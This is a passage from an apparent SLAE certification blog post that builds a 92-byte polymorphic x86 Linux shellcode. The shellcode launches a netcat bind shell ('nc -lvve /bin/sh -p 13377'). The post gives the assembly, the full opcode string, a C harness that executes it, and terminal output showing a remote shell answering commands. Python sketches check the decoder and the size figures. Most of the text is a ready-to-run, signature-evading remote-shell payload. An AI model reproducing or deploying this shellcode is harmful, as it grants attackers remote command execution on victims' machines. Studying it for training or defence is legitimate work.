After performing this operation we need to store the argument address in edx. Basically, we need to jump to the lea edx, [esi+4] instruction.

Our code does this by loading the address of that lea into edi: it starts from esi, which holds the address of the fnop instruction, adds the distance from fnop to the former nop byte (0x4 + eax), and adds 1 more byte to reach lea edx, [esi+4].

lea edi, [esi + 0x4+eax+0x1]   ; load the address of lea edx, [esi+4] instruction

The trickiest part is done. We just need to clear eax to prepare for the next argument section and jump, using edi, to the instruction that puts the argument address in edx.

xor eax,eax                    ; zeroed eax before executing next argument section
jmp edi                        ; jump to instruction lea edx, [esi+4]

Then, the same is done for the other arguments.

We end our shellcode by calling execve in the usual way.

push eax        ; 0x0
push edx        ; -vp13377
push ecx        ; -lvve/bin/sh
push ebx        ; /bin//////nc

cdq             ; eax is zero here, so cdq clears edx (execve's envp argument --> char *const envp[])
mov  ecx,esp
mov al, 0xb     ; execve syscall
int 0x80

Checking assembler.sh output

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/netcat-shellcode-804/poly ‹main●› 
╰─$ ../../../../assembler.sh poly_netcat.nasm

[*] Compiling with NASM
[*] Linking
[*] Extracting opcodes
[*] Done


Shellcode size: 92

"\x31\xc0\xb0\x08\xd9\xd0\xeb\x43\x2d\x76\x70\x31\x33\x33\x37\x37\x90\x8d\x56\x04\xb0\x0c\xd9\xd0\xeb\x31\x2d\x6c\x76\x76\x65\x2f\x62\x69\x6e\x2f\x73\x68\x90\x8d\x4e\x04\xb0\x0c\xd9\xd0\xeb\x1b\x2f\x62\x69\x6e\x2f\x2f\x2f\x2f\x2f\x2f\x6e\x63\x18\x8d\x5e\x04\x50\x52\x51\x53\x99\x89\xe1\xb0\x0b\xcd\x80\xd9\x74\x24\xf4\x5e\x88\x64\x06\x04\x8d\x7c\x30\x05\x31\xc0\xff\xe7"

--------------------
[*] Hack the World!
--------------------

No null bytes appear in the shellcode, so we are good to go and can paste it into our shellcode.c program.
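
To tie these bytes back to the argParser walkthrough, here is a sketch in Python that replays the decoder on the 92 bytes above. It is not an emulator: it only mimics the three address computations of argParser, and it assumes each argument section starts with the byte pattern b0 NN d9 d0 eb (mov al, N; fnop; jmp short).

```python
import re

code = bytearray.fromhex(
    "31c0b008d9d0eb43" "2d7670313333373790" "8d5604"
    "b00cd9d0eb31" "2d6c7676652f62696e2f736890" "8d4e04"
    "b00cd9d0eb1b" "2f62696e2f2f2f2f2f2f6e6318" "8d5e04"
    "5052515399" "89e1" "b00b" "cd80"
    "d97424f45e" "88640604" "8d7c3005" "31c0" "ffe7"
)
size_before, nulls_before = len(code), code.count(0)

args = []
for m in re.finditer(rb"\xb0(.)\xd9\xd0\xeb", bytes(code), re.DOTALL):
    al = m.group(1)[0]        # distance loaded by `mov al, N`
    esi = m.start() + 2       # offset of fnop, recovered by fnstenv + pop esi
    code[esi + 4 + al] = 0    # mov byte [esi+0x4+eax], ah  (ah is zero)
    edi = esi + 4 + al + 1    # lea edi, [esi+0x4+eax+0x1]
    assert code[edi] == 0x8D  # jmp edi lands on the `lea reg, [esi+4]` opcode
    args.append(bytes(code[esi + 4 : esi + 4 + al]))

print(size_before, nulls_before, code.count(0), args)
```

The shellcode is null-free on disk and only gains its three string terminators at runtime. In the last section the placeholder is not a nop but the second byte of arpl (0x18), which is patched the same way.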

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc0\xb0\x08\xd9\xd0\xeb\x43\x2d\x76\x70\x31\x33\x33\x37\x37\x90\x8d\x56\x04\xb0\x0c\xd9\xd0"
"\xeb\x31\x2d\x6c\x76\x76\x65\x2f\x62\x69\x6e\x2f\x73\x68\x90\x8d\x4e\x04\xb0\x0c\xd9\xd0\xeb\x1b"
"\x2f\x62\x69\x6e\x2f\x2f\x2f\x2f\x2f\x2f\x6e\x63\x18\x8d\x5e\x04\x50\x52\x51\x53\x99\x89\xe1\xb0\x0b"
"\xcd\x80\xd9\x74\x24\xf4\x5e\x88\x64\x06\x04\x8d\x7c\x30\x05\x31\xc0\xff\xe7";


main() {

	printf("Shellcode Length: %d\n", strlen(code));
	int (*ret)() = (int(*)())code;

	ret();

}

Compiling with gcc and executing it

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/netcat-shellcode-804/poly ‹main●› 
╰─$ gcc -fno-stack-protector -m32 -z execstack -o shellcode shellcode.c
shellcode.c:11:1: warning: return type defaults to ‘int’ [-Wimplicit-int]
 main() {
 ^~~~
╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/netcat-shellcode-804/poly ‹main●› 
╰─$ ./shellcode
Shellcode Length: 92
listening on [any] 13377 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 41344

-----------

╭─edu@debian ~/Desktop/slae_x86/assignments ‹main●› 
╰─$ nc -nv 127.0.0.1 13377
(UNKNOWN) [127.0.0.1] 13377 (?) open
id
uid=1000(edu) gid=1000(edu) groups=1000(edu),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner)
ls
poly_netcat
poly_netcat.nasm
poly_netcat.o
shellcode
shellcode.c

Size: 92 bytes

After some tuning we have a 92-byte polymorphic shellcode, an increase of 28 bytes in size, which corresponds to 43.75%.
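
The size figures for the three shellcodes can be recomputed with a short Python sketch. The helper name `size_change` is made up for this example, and the netcat original is taken as 64 bytes, the length of its objdump listing, which is what the 28-byte and 43.75% figures imply.

```python
def size_change(original: int, poly: int) -> float:
    """Percentage size change of the polymorphic version relative to the original."""
    return (poly - original) / original * 100

# (original, polymorphic) sizes in bytes, as measured in this post.
sizes = {"sys_exit": (8, 7), "cat_passwd": (43, 61), "netcat": (64, 92)}

for name, (orig, poly) in sizes.items():
    pct = size_change(orig, poly)
    print(f"{name}: {poly - orig:+d} bytes, {pct:+.2f}%, within 50% limit: {pct <= 50}")
```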

A curious Note

After getting this shellcode to work, I checked how shikata_ga_nai encodes shellcode.

It appears to have some similarities to what we have done :)

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Now at: https://www.pentesteracademy.com/course?id=3

Student ID: PA-31319

All the source code files are available on GitHub at https://github.com/0xnibbles/slae_x86
